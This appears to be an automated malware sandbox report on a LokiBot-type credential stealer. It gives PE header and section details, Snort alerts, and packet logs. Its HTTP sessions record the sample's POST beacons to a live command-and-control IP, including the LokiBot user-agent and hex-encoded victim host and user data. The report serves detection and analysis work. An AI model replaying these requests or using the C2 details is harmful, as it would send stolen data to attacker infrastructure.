                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x934880x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x940000x18a0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x960000x3608
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x960000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000x914e00x92000aff169dd41780da2590a46e13b5754efFalse0.9253899561215754data7.914652202200637IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc0x940000x18a00x2000aa9044cdcb787ca0eaa8f33219f96ba0False0.62109375data5.877967603302305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x960000xc0x1000770f0d3bde4a8413cdc16f751c6499f1False0.009033203125data0.016408464515625623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0x940c80x139bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8963937039250847
                        RT_GROUP_ICON0x954740x14data1.05
                        RT_VERSION0x954980x404data0.4270428015564202

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        04/18/24-06:25:19.005076TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.524.199.107.111
                        04/18/24-06:25:20.339429TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973180192.168.2.524.199.107.111
                        04/18/24-06:25:20.339429TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.524.199.107.111
                        04/18/24-06:25:22.990627TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.524.199.107.111
                        04/18/24-06:25:20.339429TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973180192.168.2.524.199.107.111
                        04/18/24-06:25:21.592442TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.524.199.107.111
                        04/18/24-06:25:21.592442TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.524.199.107.111
                        04/18/24-06:25:19.005076TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973080192.168.2.524.199.107.111
                        04/18/24-06:25:21.592442TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.524.199.107.111
                        04/18/24-06:25:19.005076TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973080192.168.2.524.199.107.111
                        04/18/24-06:25:22.990627TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.524.199.107.111
                        04/18/24-06:25:22.990627TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.524.199.107.111
                        04/18/24-06:25:21.592442TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.524.199.107.111
                        04/18/24-06:25:19.005076TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.524.199.107.111
                        04/18/24-06:25:20.339429TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.524.199.107.111
                        04/18/24-06:25:22.990627TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.524.199.107.111

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Apr 18, 2024 06:25:18.837841988 CEST4973080192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:19.000783920 CEST804973024.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:19.002954960 CEST4973080192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:19.005075932 CEST4973080192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:19.168086052 CEST804973024.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:19.168144941 CEST4973080192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:19.330404043 CEST804973024.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:20.041980028 CEST804973024.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:20.042002916 CEST804973024.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:20.042015076 CEST804973024.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:20.042030096 CEST804973024.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:20.042063951 CEST4973080192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:20.042083979 CEST4973080192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:20.042140961 CEST4973080192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:20.174221992 CEST4973180192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:20.336997032 CEST804973124.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:20.338896036 CEST4973180192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:20.339428902 CEST4973180192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:20.501723051 CEST804973124.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:20.502202988 CEST4973180192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:20.664701939 CEST804973124.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:21.333933115 CEST804973124.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:21.333962917 CEST804973124.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:21.333978891 CEST804973124.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:21.333995104 CEST804973124.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:21.334033966 CEST4973180192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:21.334157944 CEST4973180192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:21.335185051 CEST4973180192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:21.426934958 CEST4973580192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:21.589437962 CEST804973524.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:21.589531898 CEST4973580192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:21.592442036 CEST4973580192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:21.754733086 CEST804973524.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:21.754946947 CEST4973580192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:21.917315006 CEST804973524.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:22.602963924 CEST804973524.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:22.603013039 CEST804973524.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:22.603046894 CEST804973524.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:22.603080988 CEST804973524.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:22.603105068 CEST4973580192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:22.603142977 CEST4973580192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:22.603249073 CEST4973580192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:22.824373007 CEST4973680192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:22.988187075 CEST804973624.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:22.988285065 CEST4973680192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:22.990627050 CEST4973680192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:23.152992010 CEST804973624.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:23.153083086 CEST4973680192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:23.316899061 CEST804973624.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:23.997420073 CEST804973624.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:23.997435093 CEST804973624.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:23.997445107 CEST804973624.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:23.997457027 CEST804973624.199.107.111192.168.2.5
                        Apr 18, 2024 06:25:23.997509003 CEST4973680192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:23.997562885 CEST4973680192.168.2.524.199.107.111
                        Apr 18, 2024 06:25:28.264702082 CEST4973680192.168.2.524.199.107.111

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Apr 18, 2024 06:25:10.480815887 CEST1.1.1.1192.168.2.50x64beNo error (0)windowsupdatebg.s.llnwi.net69.164.42.0A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • 24.199.107.111

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.54973024.199.107.111805780C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                        TimestampBytes transferredDirectionData
                        Apr 18, 2024 06:25:19.005075932 CEST250OUTPOST /index.php/0672554332862 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 24.199.107.111
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 3CB79FB8
                        Content-Length: 180
                        Connection: close
                        Apr 18, 2024 06:25:19.168144941 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 37 00 39 00 35 00 36 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: 'ckav.rualfons579569ALFONS-PCk0FDD42EE188E931437F4FBE2Cbz1dF
                        Apr 18, 2024 06:25:20.041980028 CEST1289INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 18 Apr 2024 04:25:19 GMT
                        Server: Apache/2.4.59 (Debian)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2412
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                        Apr 18, 2024 06:25:20.042002916 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                        Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                        Apr 18, 2024 06:25:20.042015076 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                        Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.54973124.199.107.111805780C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                        TimestampBytes transferredDirectionData
                        Apr 18, 2024 06:25:20.339428902 CEST250OUTPOST /index.php/0672554332862 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 24.199.107.111
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 3CB79FB8
                        Content-Length: 180
                        Connection: close
                        Apr 18, 2024 06:25:20.502202988 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 37 00 39 00 35 00 36 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: 'ckav.rualfons579569ALFONS-PC+0FDD42EE188E931437F4FBE2CPPSR9
                        Apr 18, 2024 06:25:21.333933115 CEST1289INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 18 Apr 2024 04:25:20 GMT
                        Server: Apache/2.4.59 (Debian)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2412
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                        Apr 18, 2024 06:25:21.333962917 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                        Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                        Apr 18, 2024 06:25:21.333978891 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                        Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.54973524.199.107.111805780C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                        TimestampBytes transferredDirectionData
                        Apr 18, 2024 06:25:21.592442036 CEST250OUTPOST /index.php/0672554332862 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 24.199.107.111
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 3CB79FB8
                        Content-Length: 153
                        Connection: close
                        Apr 18, 2024 06:25:21.754946947 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 37 00 39 00 35 00 36 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons579569ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Apr 18, 2024 06:25:22.602963924 CEST1289INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 18 Apr 2024 04:25:21 GMT
                        Server: Apache/2.4.59 (Debian)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2412
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
